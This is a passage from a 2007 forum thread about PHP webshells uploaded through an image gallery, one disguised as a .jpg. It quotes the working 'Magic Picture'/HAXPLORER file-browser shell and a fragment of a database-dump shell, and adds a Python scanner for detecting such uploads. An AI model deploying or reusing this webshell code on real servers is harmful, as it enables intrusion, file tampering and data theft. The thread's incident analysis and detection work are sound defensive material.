type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME" )."_".$sql_db."_".date("d-m-Y-H-i-s" ).".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
    if ($sql_act == "newtbl" )
    {
     echo "<b>";
     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
    }
    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
   }
   elseif ($sql_act == "dump" )
   {
    if (empty($submit))
    {
     $diplay = FALSE;
     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
     $v = join (";",$dmptbls);
     echo "<b>Only tables (explode \";\" )&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
     if ($dump_file) {$tmp = $dump_file;}
     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME" )."_".$sql_db."_".date("d-m-Y-H-i-s" ).".sql" );}
     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
     echo "</form>";
    }
    else
    {
     $diplay = TRUE;
     $set = array();
     $set["sock"] = $sql_sock;
     $set["db"] = $sql_db;
     $dump_out = "download";
     $set["print"] = 0;
     $set["nl2br"] = 0;
     $set[""] = 0;
     $set["file"] = $dump_file;
     $set["add_drop"] = TRUE;
     $set["onlytabs"] = array();
     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
     $ret = mysql_dump($set);
     if ($sql_dump_download)
     {
      @ob_clean();
      header("Content-type: application/octet-stream" );
      header("Content-length: ".strlen($ret));
      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";" );
      echo $ret;
      exit;
     }
     elseif ($sql_dump_savetofile)
     {
      $fp = fopen($sql_dump_file,"w" );
      if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
      else
      {
       fwrite($fp,$ret);
       fclose($fp);
       echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file))." )</b>.";
      }
     }
     else {echo "<b>Dump: nothing to do!</b>";}
    }
   }
   if ($diplay)
   {
    if (!empty($sql_tbl))
    {
     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;" );
     $count_row = mysql_fetch_array($count);
     mysql_free_result($count);
     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;" );
     $tbl_struct_fields = array();
     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
     $perpage = $sql_tbl_le - $sql_tbl_ls;
     if (!is_numeric($perpage)) {$perpage = 10;}
     $numpages = $count_row[0]/$perpage;
     $e = explode(" ",$sql_order);
     if (count($e) == 2)
     {
      if ($e[0] == "d" ) {$asc_desc = "DESC";}
      else {$asc_desc = "ASC";}
      $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
     }
     else {$v = "";}
     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
     $result = mysql_query($query) or print(mysql_smarterror());
     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
     if ($sql_tbl_act == "structure" ) {echo "<br><br><b>Coming sooon!</b>";}
     if ($sql_tbl_act == "insert" )
     {
      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
      if (!empty($sql_tbl_insert_radio))
      {

 

     }
      else
      {
       echo "<br><br><b>Inserting row into table:</b><br>";
       if (!empty($sql_tbl_insert_q))
       {
        $sql_query = "SELECT * FROM `".$sql_tbl."`";
        $sql_query .= " WHERE".$sql_tbl_insert_q;
        $sql_query .= " LIMIT 1;";
        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
        $values = mysql_fetch_assoc($result);
        mysql_free_result($result);
       }
       else {$values = array();}
       echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
       foreach ($tbl_struct_fields as $field)
       {
        $name = $field["Field"];
        if (empty($sql_tbl_insert_q)) {$v = "";}
        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
        $i++;
       }
       echo "</table><br>";
       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
      }
     }
     if ($sql_tbl_act == "browse" )
     {
      $sql_tbl_ls = abs($sql_tbl_ls);
      $sql_tbl_le = abs($sql_tbl_le);
      echo "<hr size=\"1\" noshade>";
      echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;";
      $b = 0;
      for($i=0;$i<$numpages;$i++)
      {
       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
       echo $i;
       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
       else {echo "&nbsp;";}
      }
      if ($i == 0) {echo "empty";}
      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>";
      echo "<tr>";
      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
      for ($i=0;$i<mysql_num_fields($result);$i++)
      {
       $v = mysql_field_name($result,$i);
       if ($e[0] == "a" ) {$s = "d"; $m = "asc";}
       else {$s = "a"; $m = "desc";}
       echo "<td>";
       if (empty($e[0])) {$e[0] = "a";}
       if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
       else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
       echo "</td>";
      }
      echo "<td><font color=\"green\"><b>Action</b></font></td>";
      echo "</tr>";
      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
      {
       echo "<tr>";
       $w = "";
       $i = 0;
       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
       $i = 0;
       foreach ($row as $k=>$v)
       {
        $v = htmlspecialchars($v);
        if ($v == "" ) {$v = "<font color=\"green\">NULL


Message edited by le_phoenix on 16-11-2007 at 20:02:04
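Both files discussed in this thread reached the server through an image gallery, and one of them carried PHP behind a `.jpg` name. The Python sketch below is an added example, not code from the thread: it checks files that claim to be images for a wrong file header and for an embedded PHP open tag. The function names, the indicator list (strings visible in the code quoted in this thread) and the sample byte strings are assumptions constructed for illustration.

```python
import os
import re

# Leading magic bytes for the image types an upload gallery normally accepts.
IMAGE_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

# Only the long open tag is matched: the two-byte "<?" occurs by chance in
# compressed image data and would flood the report with false positives.
PHP_OPEN_TAG = re.compile(rb"<\?php", re.IGNORECASE)

# Strings visible in the code quoted in this thread. They are triage hints
# for this one family, not a general signature set.
INDICATORS = {
    "banner:haxplorer": re.compile(rb"haxplorer", re.IGNORECASE),
    "request-to-globals": re.compile(rb"global\s+\$\$\w+"),
    "system-call": re.compile(rb"\bsystem\s*\("),
}


def scan_upload(filename, data):
    """Return a list of findings for one file that claims to be an image."""
    ext = os.path.splitext(filename.lower())[1]
    magics = IMAGE_MAGIC.get(ext)
    if magics is None:
        return []  # not an image by name: out of scope for this check
    findings = []
    if not data.startswith(magics):
        # The name says image, the first bytes say otherwise.
        findings.append("magic-mismatch")
    if PHP_OPEN_TAG.search(data):
        # Checked even when the header is valid: PHP can be appended to, or
        # stored in a comment field of, an otherwise well-formed image.
        findings.append("php-open-tag")
        findings.extend(n for n, rx in INDICATORS.items() if rx.search(data))
    return findings


def scan_tree(root):
    """Walk an upload directory and return {path: findings} for flagged files."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name.lower())[1] not in IMAGE_MAGIC:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                report[path] = ["unreadable"]
                continue
            findings = scan_upload(name, data)
            if findings:
                report[path] = findings
    return report


# Constructed, inert samples: the PHP tags contain only a comment.
SAMPLE_REAL_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + bytes(64)
SAMPLE_FAKE_JPG = (
    b"<html>\n<title>constructed sample</title>\n"
    b"<?php /* global $$key; system( */ ?>\n"
    b"HAXPLORER - Server Files Browser\n"
)
SAMPLE_POLYGLOT_GIF = b"GIF89a" + bytes(32) + b"<?php /* inert */ ?>"

if __name__ == "__main__":
    for label, name, blob in (
        ("real jpeg", "holiday.jpg", SAMPLE_REAL_JPEG),
        ("fake jpg", "sample.jpg", SAMPLE_FAKE_JPG),
        ("polyglot gif", "anim.gif", SAMPLE_POLYGLOT_GIF),
    ):
        print(label, scan_upload(name, blob))
```

Any finding on a file with an image name deserves a manual look; an empty report only means these particular checks found nothing.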

Marsh Posté on 16-11-2007 at 17:02:43

Here is the code I found in the uploaded image:

A tool that is also considered a trojan,
which lets you list, modify and delete any file on your site.
Very useful for quickly administering your site, but it is much more simplified than the first one!

Admire code that works on the first try, friends!
(PS: above all, do not put it on your site without protecting it with a password!)

Code:
  1. <html>
  2. <head>
  3. <title>Magic Picture devellopped by securfrog</title>
  4. </head>
  5. </body>
  6. <center>
  7. <table width=75% border=1>
  8. <tr>
  9. <td bgcolor=gray>
  10. <center><u><b>Magic Picture devellopped by securfrog</font></b></u></center>
  11. <?php
  12. /*Setting some envirionment variables...*/
  13. /* I added this to ensure the script will run correctly...
  14.    Please enter the Script's filename in this variable. */ 
  15. $SFileName=$PHP_SELF;
  16. /* uncomment the two following variables if you want to use http
  17.    authentication. This will password protect your PHPShell */
  18. //$http_auth_user = "phpshell"; /* HTTP Authorisation username, uncomment if you want to use this */
  19. //$http_auth_pass = "phpshell"; /* HTTP Authorisation password, uncomment if you want to use this */    
  20. error_reporting(0);
  21. $PHPVer=phpversion();
  22. $isGoodver=(intval($PHPVer[0])>=4);
  23. $scriptTitle = "MagicPicture";
  24. $scriptident = "$scriptTitle devellopped by securfrog";
  25. $urlAdd = "";
  26. $formAdd = "";
  27. function walkArray($array){
  28.   while (list($key, $data) = each($array))
  29.     if (is_array($data)) { walkArray($data); }
  30.     else { global $$key; $$key = $data; global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";}
  31. }
  32. if (isset($_PUT)) walkArray($_PUT);
  33. if (isset($_GET)) walkArray($_GET);
  34. if (isset($_POST)) walkArray($_POST);
  35. $pos = strpos($urlAdd, "s=r" );
  36. if (strval($pos) != "" ) {
  37. $urlAdd= substr($urlAdd, 0, $pos);
  38. }
  39. $urlAdd .= "&s=r&";
  40. if (empty($Pmax))
  41. $Pmax = 125;   /* Identifies the max amount of Directories and files listed on one page */
  42. if (empty($Pidx))
  43. $Pidx = 0;
  44. $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
  45. $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
  46. $scriptdate = "10/02/2006";
  47. $scriptver = "Version 2.6.6dev the PHPShell is made by the maker ";
  48. $LOCAL_IMAGE_DIR = "img";
  49. $REMOTE_IMAGE_URL = "img";
  50. $img = array(
  51.    "Edit"   => "edit.gif",
  52.    "Download"  => "download.gif",
  53.    "Upload"  => "upload.gif",
  54.    "Delete"  => "delete.gif",
  55.    "View"   => "view.gif",
  56.    "Rename"  => "rename.gif",
  57.    "Move"   => "move.gif",
  58.    "Copy"   => "copy.gif",
  59.    "Execute"  => "exec.gif"
  60.             );
  61. while (list($id, $im)=each($img))
  62. if (file_exists("$LOCAL_IMAGE_DIR/$im" ))
  63.  $img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_URL/$im\" alt=\"$id\">";
  64. else
  65.   $img[$id] = "[$id]";
  66. /* HTTP AUTHENTICATION */
  67.     if  ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || $PHP_AUTH_PW != $http_auth_pass)  ||  (($logoff==1) && $noauth=="yes" )  )   {
  68.     setcookie("noauth","" );
  69.     Header( "WWW-authenticate:  Basic realm=\"$scriptTitle $scriptver\"" );
  70.     Header( "HTTP/1.0  401  Unauthorized" );
  71.     echo "Your username or password is incorrect";
  72.     exit ;
  73.      
  74.     }
  75. function buildUrl($display, $url) {
  76.         global $urlAdd;
  77.         $url = $SFileName . "?$urlAdd$url";
  78. return "<a href=\"$url\">$display</a>";
  79. }
  80. function sp($mp) {
  81. for ( $i = 0; $i < $mp; $i++ )
  82.  $ret .= "&nbsp;";
  83. return $ret;
  84. }
  85. function spacetonbsp($instr) { return str_replace(" ", "&nbsp;", $instr);  }
  86. function Mydeldir($Fdir) {
  87. if (is_dir($Fdir)) {
  88.  $Fh=@opendir($Fdir);
  89.   while ($Fbuf = readdir($Fh))
  90.    if (($Fbuf != "." ) && ($Fbuf != ".." ))
  91.    Mydeldir("$Fdir/$Fbuf" );
  92.  @closedir($Fh);
  93.    return rmdir($Fdir);
  94. } else {
  95.  return unlink($Fdir);
  96. }
  97. }
  98. function arrval ($array) {
  99. list($key, $data) = $array;
  100. return $data;
  101. }
  102. function formatsize($insize) { 
  103. $size = $insize;
  104. $add = "B";
  105. if ($size > 1024) {
  106.   $size = intval(intval($size) / 1.024)/1000;
  107.   $add = "KB";
  108.  }
  109.  if ($size > 1024) {
  110.   $size = intval(intval($size) / 1.024)/1000;
  111.   $add = "MB";
  112.  }
  113.  if ($size > 1024) {
  114.   $size = intval(intval($size) / 1.024)/1000;
  115.   $add = "GB";
  116.  }
  117.  if ($size > 1024) {
  118.   $size = intval(intval($size) / 1.024)/1000;
  119.   $add = "TB";
  120.  }
  121.  return "$size $add";
  122. }
  123. if ($cmd != "downl" ) {
  124. ?>
  125. <!-- <?php echo $scriptident ?>, <?php echo $scriptver ?>, <?php echo $scriptdate ?>  -->
  126. <HTML>
  127. <HEAD>
  128.   <STYLE>
  129.   <!--
  130.     A{ text-decoration:none; color:navy; font-size: 12px }
  131.     body { font-size: 12px;
  132.            font-family: arial, helvetica;
  133.             scrollbar-width: 5;
  134.             scrollbar-height: 5;
  135.             scrollbar-face-color: white;
  136.             scrollbar-shadow-color: silver;
  137.             scrollbar-highlight-color: white;
  138.             scrollbar-3dlight-color:silver;
  139.             scrollbar-darkshadow-color: silver;
  140.             scrollbar-track-color: white;
  141.             scrollbar-arrow-color: black;
  142.     }
  143.     Table { font-size: 12px; }
  144.     TR{ font-size: 12px; }
  145.     TD{ font-size: 12px;
  146.         font-family: arial, helvetical;
  147.         BORDER-LEFT: black 0px solid;
  148. BORDER-RIGHT: black 0px solid;
  149. BORDER-TOP: black 0px solid;
  150. BORDER-BOTTOM: black 0px solid;
  151. COLOR: black;
  152.     }
  153.     .border{       BORDER-LEFT: black 1px solid;
  154.      BORDER-RIGHT: black 1px solid;
  155.      BORDER-TOP: black 1px solid;
  156.      BORDER-BOTTOM: black 1px solid;
  157.    }
  158.     .none  {       BORDER-LEFT: black 0px solid;
  159.      BORDER-RIGHT: black 0px solid;
  160.      BORDER-TOP: black 0px solid;
  161.      BORDER-BOTTOM: black 0px solid;
  162.    }
  163.     .inputtext {
  164.      background-color: #EFEFEF;
  165.      font-family: arial, helvetica;
  166.      border: 1px solid #000000;
  167.      height: 20;
  168.     }
  169.     .lighttd {       background: #F8F8F8;
  170.     }
  171.     .darktd {        background: #E8E8E8;
  172.     }
  173.     input { font-family: arial, helvetica;
  174.     }
  175.     .inputbutton {
  176.                         background-color: silver;
  177.   border: 1px solid #000000;
  178.   border-width: 1px;
  179.   height: 20;
  180.     }
  181.     .inputtextarea {
  182.      background-color: #EFEFEF;
  183.      border: 1px solid #000000;
  184.      scrollbar-width: 5;
  185.      scrollbar-height: 5;
  186.      scrollbar-face-color: #EFEFEF;
  187.      scrollbar-shadow-color: silver;
  188.      scrollbar-highlight-color: #EFEFEF;
  189.      scrollbar-3dlight-color:silver;
  190.      scrollbar-darkshadow-color: silver;
  191.      scrollbar-track-color: #EFEFEF;
  192.      scrollbar-arrow-color: black;
  193.     }
  194.     .top { BORDER-TOP: black 1px solid; }
  195.     .textin { BORDER-LEFT: silver 1px solid;
  196.               BORDER-RIGHT: silver 1px solid;
  197.        BORDER-TOP: silver 1px solid;
  198.               BORDER-BOTTOM: silver 1px solid;
  199.               width: 99%; font-size: 12px; font-weight: bold; color: navy;
  200.             }
  201.     .notop { BORDER-TOP: black 0px solid; }
  202.     .bottom { BORDER-BOTTOM: black 1px solid; }
  203.     .nobottom { BORDER-BOTTOM: black 0px solid; }
  204.     .left { BORDER-LEFT: black 1px solid; }
  205.     .noleft { BORDER-LEFT: black 0px solid; }
  206.     .right { BORDER-RIGHT: black 1px solid; }
  207.     .noright { BORDER-RIGHT: black 0px solid; }
  208.     .silver{ BACKGROUND: silver; }
  209.   -->
  210.   </STYLE>
  211.   <TITLE><?php echo $SFileName ?></TITLE>
  212. </HEAD>
  213. <body topmargin="0" leftmargin="0">
  214. <div style="position: absolute; background: white; z-order:10000; top:0; left:0; width: 100%; height: 100%;">
  215. <table width=100% height="100%" NOWRAP border="0">
  216.   <tr NOWRAP>
  217.    <td width="100%" NOWRAP>
  218.     <table NOWRAP width=100% border="0" cellpadding="0" cellspacing="0">
  219.      <tr>
  220.       <td width="100%" class="silver border">
  221.        <center>
  222.     <strong>
  223.   <font size=3><?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?></font>
  224.             </strong>
  225.        </center>
  226.       </td>
  227.      </tr>
  228.     </table><br>
  229. <?php
  230. }
  231. if ( $cmd=="dir" ) {
  232.    $h=@opendir($dir);
  233.  if ($h == false) {
  234.     echo "<br><font color=\"red\">".sp(3)."\n\n\n\n
  235.                 COULD NOT OPEN THIS DIRECTORY!!!<br>".sp(3)."\n
  236.                 THE SCRIPT WILL RESULT IN AN ERROR!!!
  237.                 <br><br>".sp(3)."\n
  238.                 PLEASE MAKE SURE YOU'VE GOT READ PERMISSIONS TO THE DIR...
  239.                 <br><br></font>\n\n\n\n";
  240.  }
  241.         if (function_exists('realpath')) {
  242.  $partdir = realpath($dir);
  243. }
  244.         else {
  245.  $partdir = $dir;
  246. }
  247.  if (strlen($partdir) >= 100) {
  248.   $partdir = substr($partdir, -100);
  249.   $pos = strpos($partdir, "/" );
  250.   if (strval($pos) != "" ) {
  251.    $partdir = "<--   ...".substr($partdir, $pos);
  252.   }
  253.         $partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir )));
  254.         $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir )));
  255. $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file )));
  256.  }
  257.     ?>
  258.       <form name="urlform" action="<?php echo "$SFileName?$urlAdd"; ?>" method="POST"><input type="hidden" name="cmd" value="dir">
  259.          <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0">
  260.   <tr>
  261.    <td width="100%" class="silver border">
  262.     <center>&nbsp;HAXPLORER - Server Files Browser...&nbsp;</center>
  263.    </td>
  264.   </tr>
  265.  </table>
  266.        <br>
  267.  <table width="100%" border="0" cellpadding="0" cellspacing="0">
  268.   <tr>
  269.            <td class="border nobottom noright">
  270.             &nbsp;Browsing:&nbsp;
  271.   </td>
  272.           <td width="100%" class="border nobottom noleft">
  273.         <table width="100%" border="0" cellpadding="1" cellspacing="0">
  274.              <tr>
  275.               <td NOWRAP width="99%" align="center"><input type="text" name="dir" class="none textin" value="<?php echo $partdir ?>"></td>
  276.               <td NOWRAP><center>&nbsp;<a href="javascript: urlform.submit();"><b>GO<b></a>&nbsp;<center></td>
  277.              </tr>
  278.             </table>
  279.            
  280.   </td>
  281.  </tr>
  282. </table>
  283.   <!--    </form>   -->
  284.         <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0" >
  285.          <tr>
  286.   <td width="100%" NOWRAP class="silver border">
  287.    &nbsp;Filename&nbsp;
  288.   </td>
  289.           <td NOWRAP class="silver border noleft">
  290.    &nbsp;Actions&nbsp;(Attempt to perform)&nbsp;
  291.   </td>
  292.           <td NOWRAP class="silver border noleft">
  293.    &nbsp;Size&nbsp;
  294.   </td>
  295.           <td width=1 NOWRAP class="silver border noleft">
  296.    &nbsp;Attributes&nbsp;
  297.   </td>
  298.           <td NOWRAP class="silver border noleft">
  299.    &nbsp;Modification Date&nbsp;
  300.   </td>
  301.  <tr>
  302.     <?php
  303.        /* <!-- This whole heap of junk is the sorting section... */
  304.  $dirn  = array();
  305.  $filen  = array();
  306.  $filesizes = 0;
  307.  while ($buf = readdir($h)) {
  308.     if (is_dir("$dir/$buf" ))
  309.   $dirn[] = $buf;
  310.       else
  311.    $filen[] = $buf;
  312.      }
  313.  $dirno  = count($dirn) + 1;
  314.   $fileno = count($filen) + 1;
  315.     function mycmp($a, $b){
  316.   if ($a == $b) return 0;
  317.   return (strtolower($a) < strtolower($b)) ? -1 : 1;
  318.  }
  319.  if (function_exists("usort" )) {
  320.   usort($dirn, "mycmp" );
  321.   usort($filen, "mycmp" );
  322.  }
  323.  else {
  324.   sort ($dirn);
  325.    sort ($filen);
  326.   }
  327. reset ($dirn);
  328.  reset ($filen);
  329.  if (function_exists('array_merge')) {
  330.  $filelist = array_merge ($dirn, $filen);
  331. }
  332.  else {
  333.  $filelist = $dirn + $filen;
  334. }
  335. if ( count($filelist)-1 > $Pmax ) {
  336.  $from = $Pidx * $Pmax;
  337.  $to = ($Pidx + 1) * $Pmax-1;
  338.  if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 )
  339.   $to = count($filelist) - 1;
  340.  if ($to > count($filelist)-1)
  341.   $to = count($filelist)-1;
  342.  $Dcontents = array();
  343.  For ($Fi = $from; $Fi <= $to; $Fi++) {
  344.   $Dcontents[] = $filelist[$Fi];
  345.  }
  346. }
  347. else {
  348.  $Dcontents = $filelist;
  349. }
  350.      $tdcolors = array("lighttd", "darktd" );
  351.      while (list ($key, $file) = each ($Dcontents)) {
  352.           if (!$tdcolor=arrval(each($tdcolors))) {
  353.     reset($tdcolors);
  354.     $tdcolor = arrval(each($tdcolors));   }
  355.           
  356.   if (is_dir("$dir/$file" )) { /* <!-- If it's a Directory --> */
  357.              /* <!-- Dirname --> */
  358.   echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( "[$file]", "cmd=dir&dir=$dir/$file" ) .sp(9)."</td>\n";
  359.       /* <!-- Actions --> */
  360.   echo "<td NOWRAP class=\"top right $tdcolor\"><center>".sp(2)."\n";
  361.     /* <!-- Rename --> */
  362.   if ( ($file != "." ) && ($file != ".." ) )
  363.    echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file" ).sp(3)."\n";
  364.     /* <!-- Delete --> */
  365.   if ( ($file != "." ) && ($file != ".." ) )
  366.    echo sp(3).buildUrl( $img["Delete"], "cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir" )."\n";
  367.    /* <!-- End of Actions --> */
  368.   echo "&nbsp;&nbsp;</center></td>\n";
  369.       /* <!-- Size --> */
  370.   echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;</td>\n";
  371.     /* <!-- Attributes --> */
  372.   echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
  373.    echo "<strong>D</strong>";
  374.          if ( @is_readable("$dir/$file" ) ) {
